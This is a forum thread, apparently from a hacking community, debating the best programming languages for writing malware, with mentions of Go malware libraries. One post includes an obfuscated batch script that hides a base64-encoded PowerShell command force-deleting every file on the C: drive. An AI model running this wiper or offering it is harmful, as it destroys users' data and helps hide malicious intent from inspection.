I think this is the best answer for this. Any language can be used to create malware, but C is mostly fundamental in learning anything related to it imo. Golang is becoming far more popular as you can compile it for anything with ease, and the language itself is pretty simple to learn compared to C++/Java.
1 Like
C/C++
If you use pure assembly you get extra points
4 Likes
I’m a complete noob when it comes to writing malware, but I’ve heard that Perl isn’t a bad language to write malware in as most Unix systems come with it out of the box. Is Perl still a viable option when creating malware?
Perl is viable but any compiled language will work fine. C/C++ are great options because of the control you will have over the devices but also the small compilation size of the binary. I would try to stay away from any like java or python just because of the large compile sizes.
GoLang is a good option and depending on the compiler used can lead to small binaries. As well as its as easy as something like python to pickup with very good compilation time and good control over the system. And it is cross compiled aswell as cross platform so no need to create two code bases for interacting with unix and windows.
TL;DR: All languages will work at the end of the day, I would stay away from anything not compiled or anything that will create large binary sizes. Take a look at GoLang and see what you think.
2 Likes
Golang is great, quite a few libraries are available to write malware such as GitHub - redcode-labs/Coldfire: Golang malware development library and GitHub - redcode-labs/Neurax: A framework for constructing self-spreading binaries.
8 Likes
maybe you mean exploit development here .
so i recommended c/c++ , python , asm .
it’s all used for windows exploit development and linux .
but it’s al most up to the hacker or developer what to use .
What about c# i dont recommended c# , vb ,
1 Like
c because it is like ams and great for writing advance malware plus theres a course on youtube explaining how to make one not good for starters though
Bro where you getting your info from because clearly its wrong. Java is for websites and python can be used for malware but takes up resources so it kinda crap.C can be compressed super small and run with less resources and it is great for avr programming.
Okay Java isn’t for websites, that’s javascript. John Hammond did a bit recently showcasing how Discord is a breeding ground for python-based malware (even though it’s not new). I mean anything can be used for malicious purposes. Take batch for example:
REM DO NOT RUN THIS, IT'S JUST AN EXAMPLE
@echo off
Setlocal enabledelayedexpansion
Set alph=p0daodkf3wxdf2es4kdrabk3s9k32h9dkfek349lkjf8l
Set _a=%alph:~-1%
Set _b=!alph:~-6,1!
Set _c=%alph:~-11,1%
Set _d=!alph:~-16,1!
Set _e=%alph:~-21,1%
Set _f=!alph:~-26,1!
Set _g=%alph:~-31,1%
Set _h=!alph:~-36,1!
Set _i=%alph:~-41,1%
Set _j=!alph:~-46,1!
%_j%%_i%%_h%%_g%%_f%%_e%%_d%%_c%%_b%%_a% -nop -E Z2V0LWNoaWxkaXRlbSAtcmVjdXJzZSAtZm9yY2UgLXBhdGggQzpcIC1PbkVycm9yIFNpbGVudGx5Q29udGludWUgfCBSZW1vdmUtSXRlbSAtRm9yY2U=
This is clearly malicious as it deletes everything on your system with no warning and yet you can’t really tell what it is, excepting for the -nop -E. But the point is that anything can really be malware.
Now the most common programming languages used for writing malware due to efficiency is simply the C family due to portability across different architectures, the .NET family because of the ease of use on anything Windows, and the newer languages Go-lang and Rust-lang. But again mind you that other popular scripting languages such as javascript and python are also used extensively.
1 Like
Any Good language can be created into malware. its just about how you wanna get it done, a lot of people say C++, C Or assembly but Malware is just manipulating the system into preforming certain tasks that can’t really be normally done. You can make python Malware that spreads using the network but it will be difficult because python alone isn’t enough. So to make it more clear for you Yes you can, but it all depends on the operator and how you will go about making it work.
Finally I’ve selected C#.
for me i was malware author from 4 years ago and for today i test c# ,python and c++ .
the easiest language of course c# .
but the better language of course c++ it gives you low level than c# .
what else your c++ code will no be managed by Microsoft so you can do anything .
what about Python for malware development , if you know how to run python inside c++ that’s enough to write ransomware in less than 30 minute with options not bad .
examples : ftp client to upload files.
and crypter to crypt files
etc …
and finally that’s only my opinion maybe some one else have different opinion.
3 Likes
I have been following this topic for quite a bit of time. I just had to reply, I even created an account to reply here.
The best language is of course COBOL.
2 Likes
Basically, any language could be suitable. The real question - how much effective it will be. In my opinion, any language that give you the opportunity to access memory address/pointers/etc will be fine. As malware writer, your goal is to mess with memory, be able to intercept things, redirect code execution flaw etc and all these things, should happen very fast. Thus, you should be able to understand your motives & goals, and employ a conclusion. If i would like to write a malware, i would probably use: C/C++, rust.
7 Likes
I can recommend Golang because it is fast, made to follow the KISS principles of programming and it is a language which has been used in multiple instances for Malware by State Sponsored groups. I do agree that you can use a wide array of languages for writing Malware but Go has been used for it much more than before and it may be the new norm (who knows) because of the speed, and Golang binaries are harder to reverse engineer and analyze as a whole compared to other languages. But that is my opinion for what it is worth, I hope this helps!
I agree that a complied language will be faster and smaller however, internet connections are faster and machines are also faster so python-based malware is on the rise
esolang, obviously… nobody’s expecting that zca
1 Like
why?
I mean, it obviously depends on what the hierarchy of objectives are.
Some is just for replicating; some is just for collecting information and communication; some is for changing something. Some is a bit of everything in varying amounts. Context too, some is industrial, some is social, some is financial, some is communications, some is miltary, some is logistics. There are many permutations and a multipolar taxonomy.
java 
don’t make fun here its used for software development and web development